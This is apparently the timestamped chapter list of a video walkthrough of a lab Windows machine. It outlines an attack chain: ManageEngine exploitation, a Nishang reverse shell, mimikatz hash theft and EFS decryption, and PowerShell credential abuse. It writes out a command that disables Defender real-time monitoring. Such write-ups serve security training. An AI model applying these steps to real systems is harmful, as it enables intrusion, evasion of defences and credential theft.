00:35 - Begin of Recon
01:42 - Checking the MangeEngine Page
02:23 - Running Searchsploit to see potential exploits
03:40 - Enumerating valid usernames via AjaxDomainServlet
05:40 - Logging in with guest:guest
07:10 - Running the privilege escalation script to get Administrator access
08:00 - Searching for information on this exploit
08:20 - Blog post missing... Searching Archive.org and Google Cache for a mirror
10:00 - Making curl go through burp to step through the exploit in BurpSuite
18:00 - Copying the admin cookies into FireFox
19:25 - Going to Admin then Custom Triggers to execute code on the server
21:50 - Getting a reverse shell via Nishang
22:30 - Using iconv to create UTF-16LE encoded Base64 for use with "-EncodedCommand" option
25:45 - Reverse Shell as System returned, but EFS Protects the flags
26:45 - Finding interesting files with get-childitem -recurse . | select FullName
28:50 - Copying mimikatz over to the box to steal NTLM Hashes
31:00 - Defender blocked us. Disable defender with Set-MpPreference -DisableRealtimeMonitoring $true
32:50 - Using hashes.org to view password of Zachary, checking his groups to see he can view event logs
33:30 - Doing some powershell goodness to search event logs!
40:50 - Extracting ProcessCommandLine from the logs (Tolu Password), its a shame Nishang screws with how some commands output to stdout. This could of been a lot cleaner.
43:00 - Using Mimikatz to decrypt the EFS Protected file with Tolu's password
57:25 - Need to read Leo's admin-pass.xml, load meterpreter and migrate into his namespace
01:00:20 - admin-pass is the output of SecureString, lets decrypt it to get the admin password
01:02:20 - Using Invoke-Command with the credential object created to execute commands as administrator
01:03:50 - Cannot read root.txt because of "Double Hop Problem" (how PowerShell Authenticates), using CredSSP Authentication to fix this.